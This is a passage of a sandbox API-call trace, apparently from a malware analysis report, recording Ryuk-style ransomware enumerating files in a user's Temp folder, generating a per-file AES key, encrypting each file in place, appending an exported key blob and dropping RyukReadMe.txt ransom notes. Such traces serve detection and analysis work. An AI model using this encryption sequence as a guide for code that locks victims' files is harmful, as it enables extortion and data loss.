CloseHandle (hObject=0x190) returned 1 [0143.411] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.415] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.415] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.415] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.415] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.415] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Ec-D37adA- wErBEhN.swf", dwFileAttributes=0x80) returned 1 [0143.416] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Ec-D37adA- wErBEhN.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ec-d37ada- werbehn.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.416] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=31839) returned 1 [0143.416] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=31839) returned 1 [0143.416] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x7b3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.416] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.417] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.417] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.417] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.417] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.417] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7c5f, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x7c5f, lpOverlapped=0x0) returned 1 [0143.417] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.417] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x7c5f, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x7c60) returned 1 [0143.418] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.418] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x7c60, lpOverlapped=0x0) returned 1 [0143.418] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.418] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.418] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.418] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.418] CloseHandle (hObject=0x190) returned 1 [0143.434] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.438] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.438] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.438] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.438] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.438] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eebY.gif", dwFileAttributes=0x80) returned 1 [0143.439] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eebY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\eeby.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.439] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=11144) returned 1 [0143.439] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=11144) returned 1 [0143.439] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x2a66, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.439] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.440] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.440] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.440] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.440] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.440] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2b88, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x2b88, lpOverlapped=0x0) returned 1 [0143.440] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.440] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x2b88, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x2b90) returned 1 [0143.440] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.440] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x2b90, lpOverlapped=0x0) returned 1 [0143.440] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.440] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.440] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.441] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.441] CloseHandle (hObject=0x190) returned 1 [0143.467] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.471] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.471] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.471] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.471] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.471] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eKqZ.jpg", dwFileAttributes=0x80) returned 1 [0143.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eKqZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ekqz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.472] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=38842) returned 1 [0143.472] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=38842) returned 1 [0143.472] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x9698, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.472] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.472] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.472] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.472] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.473] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.473] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x97ba, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x97ba, lpOverlapped=0x0) returned 1 [0143.473] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.473] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x97ba, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x97c0) returned 1 [0143.473] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.473] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x97c0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x97c0, lpOverlapped=0x0) returned 1 [0143.474] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.474] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.474] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.474] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.474] CloseHandle (hObject=0x190) returned 1 [0143.490] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.494] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.494] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.494] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.494] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.494] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt", dwFileAttributes=0x80) returned 1 [0143.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0143.495] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0143.495] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.495] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.495] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.495] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gl3Cppwe_VZeT5bw.mp4", dwFileAttributes=0x80) returned 1 [0143.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gl3Cppwe_VZeT5bw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gl3cppwe_vzet5bw.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.495] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=38917) returned 1 [0143.495] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=38917) returned 1 [0143.495] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x96e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.495] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.496] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.496] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.496] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.496] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.496] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x9805, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x9805, lpOverlapped=0x0) returned 1 [0143.497] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.497] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x9805, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x9810) returned 1 [0143.497] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.497] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9810, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x9810, lpOverlapped=0x0) returned 1 [0143.497] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.497] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.497] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.497] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.497] CloseHandle (hObject=0x190) returned 1 [0143.514] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.518] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.518] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.518] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.518] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.518] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\h-d0IMeLC.m4a", dwFileAttributes=0x80) returned 1 [0143.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\h-d0IMeLC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\h-d0imelc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.519] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=73788) returned 1 [0143.519] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=73788) returned 1 [0143.519] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x11f1a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.519] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.520] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.520] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.520] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.520] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.520] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1203c, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x1203c, lpOverlapped=0x0) returned 1 [0143.521] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.521] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x1203c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x12040) returned 1 [0143.521] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.521] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12040, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x12040, lpOverlapped=0x0) returned 1 [0143.522] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.522] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.522] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.522] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.522] CloseHandle (hObject=0x190) returned 1 [0143.537] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.541] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.542] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.542] SetLastError (dwErrCode=0x0) [0143.542] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.542] GetLastError () returned 0xb7 [0143.542] CloseHandle (hObject=0x190) returned 1 [0143.542] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0143.543] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.543] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.543] SetLastError (dwErrCode=0x0) [0143.543] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.544] GetLastError () returned 0x0 [0143.544] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0143.544] CloseHandle (hObject=0x194) returned 1 [0143.545] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0143.545] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.545] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.545] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.545] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat", dwFileAttributes=0x80) returned 1 [0143.546] CreateFileW 